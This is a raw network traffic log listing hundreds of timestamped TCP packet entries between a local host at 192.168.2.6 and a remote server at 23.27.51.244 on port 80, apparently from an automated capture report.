    Jan 6, 2025 06:03:59.448971987 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.448982000 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.448992968 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.448997021 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.449003935 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.449014902 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.449023962 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.449028015 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.449034929 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.449043036 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.449045897 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.449063063 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.449081898 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.449111938 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.449208021 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.449218035 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.449254990 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.449361086 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.449371099 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.449379921 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.449392080 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.449400902 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.449403048 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.449414015 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.449424982 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.449435949 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.449448109 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.449448109 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.449485064 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.449485064 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.449672937 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.449683905 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.449692965 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.449703932 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.449713945 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.449722052 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.449729919 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.449740887 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.449748993 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.449750900 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.449764013 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.449778080 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.449795961 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.449975967 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.449985981 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.449996948 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.450006962 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.450016975 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.450021029 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.450026989 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.450042963 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.450043917 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.450054884 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.450062990 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.450064898 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.450077057 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.450081110 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.450086117 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.450103998 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.450109005 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.450114965 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.450124979 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.450134993 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.450135946 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.450153112 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.450189114 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.450603008 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.450613976 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.450623989 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.450634003 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.450644016 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.450644970 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.450654984 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.450665951 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.450670958 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.450680971 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.450691938 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.450690985 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.450701952 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.450711012 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.450715065 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.450721025 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.450731039 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.450737000 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.450742006 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.450778008 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.450797081 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.451052904 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451062918 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451071978 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451081991 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451097012 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.451098919 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451109886 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451121092 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451131105 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.451131105 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451142073 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451150894 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451152086 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.451160908 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451170921 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.451189041 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.451212883 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.451399088 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451410055 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451421022 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451431990 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451437950 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.451442003 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451474905 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.451474905 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.451504946 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.451587915 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451600075 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451610088 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451622009 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451631069 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451638937 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.451641083 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451652050 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451658010 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.451662064 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451673985 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451683044 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451685905 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.451694012 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451704025 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451711893 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.451714993 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451724052 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451730013 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451739073 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451746941 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.451750994 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.451775074 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.451797962 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.452136040 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.453183889 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.538614988 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.538640976 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.538650036 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.538702965 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.538706064 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.538716078 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.538757086 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.538758993 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.538758039 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.538769007 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.538780928 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.538795948 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.538810968 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.538943052 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.538954020 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.538961887 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.538984060 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.538995028 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.539009094 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.539019108 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.539021969 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.539031029 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.539047003 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.539047003 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.539078951 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.539079905 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.539132118 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.539141893 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.539150953 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.539160013 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.539169073 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.539184093 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.539212942 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.539263010 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.539288044 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.539341927 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.539376020 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.539385080 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.539397955 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.539406061 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.539439917 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.539439917 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.539560080 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.539570093 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.539577961 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.539586067 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.539594889 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.539603949 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.539608955 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.539613962 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.539633989 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.539633989 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.539663076 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.539824009 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.539833069 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.539841890 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.539850950 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.539860964 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.539865971 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.539870024 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.539880037 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.539889097 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.539899111 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.539918900 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.539942026 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.540038109 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.540046930 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.540055990 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.540076017 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.540101051 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.540296078 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.540306091 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.540313959 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.540323019 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.540333033 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.540342093 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.540343046 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.540350914 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.540359020 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.540360928 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.540369987 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.540380001 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.540379047 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.540390968 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.540399075 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.540422916 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.540422916 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.540661097 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.540669918 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.540678978 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.540688038 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.540697098 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.540700912 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.540707111 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.540715933 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.540721893 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.540725946 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.540735006 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.540741920 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.540744066 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.540752888 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.540761948 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.540771008 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.540783882 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.540783882 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.540783882 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.540807009 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.541148901 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.541157961 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.541167021 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.541178942 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.541183949 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.541193008 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.541202068 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.541208029 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.541208029 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.541239977 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.541239977 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.541311979 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.541321039 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.541330099 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.541338921 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.541347980 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.541359901 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.541385889 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.541558981 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.541568995 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.541577101 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.541585922 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.541594982 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.541603088 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.541611910 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.541619062 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.541620016 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.541619062 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.541630030 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.541644096 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.541646957 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.541646957 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.541654110 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.541663885 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.541671038 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.541673899 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.541682959 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.541695118 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.541708946 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.541708946 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.541728020 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.541745901 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.542052984 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.542061090 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.542069912 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.542078972 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.542088032 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.542094946 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.542097092 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.542105913 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.542114973 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.542120934 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.542124033 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.542145014 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.542145014 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.542145967 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.542154074 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.542162895 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.542169094 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.542171955 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.542180061 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.542190075 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.542191029 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.542190075 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.542198896 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.542207956 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.542213917 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.542217970 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.542227030 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.542233944 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.542236090 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.542253017 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.542253017 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.542274952 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.542649031 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.542656898 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.542665005 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.542675018 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.542690992 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.542716980 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.629174948 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.629215956 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.629225016 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.629235983 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.629249096 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.629259109 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.629302979 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.629311085 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.629355907 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.629385948 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.629396915 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.629406929 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.629416943 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.629426956 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.629436970 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.629443884 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.629498005 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.629540920 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.629551888 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.629560947 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.629582882 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.629582882 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.629595995 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.629602909 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.629626989 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.629740000 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.629750967 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.629761934 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.629770994 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.629782915 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.629784107 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.629793882 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.629800081 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.629829884 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.629844904 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.629892111 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.629900932 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.629936934 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.629937887 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.629945993 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.629956007 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.629973888 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.629982948 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.629986048 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.630007982 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.630034924 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:59.630175114 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.630187035 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:59.630198002 CET804970923.27.51.244192.168.2.6
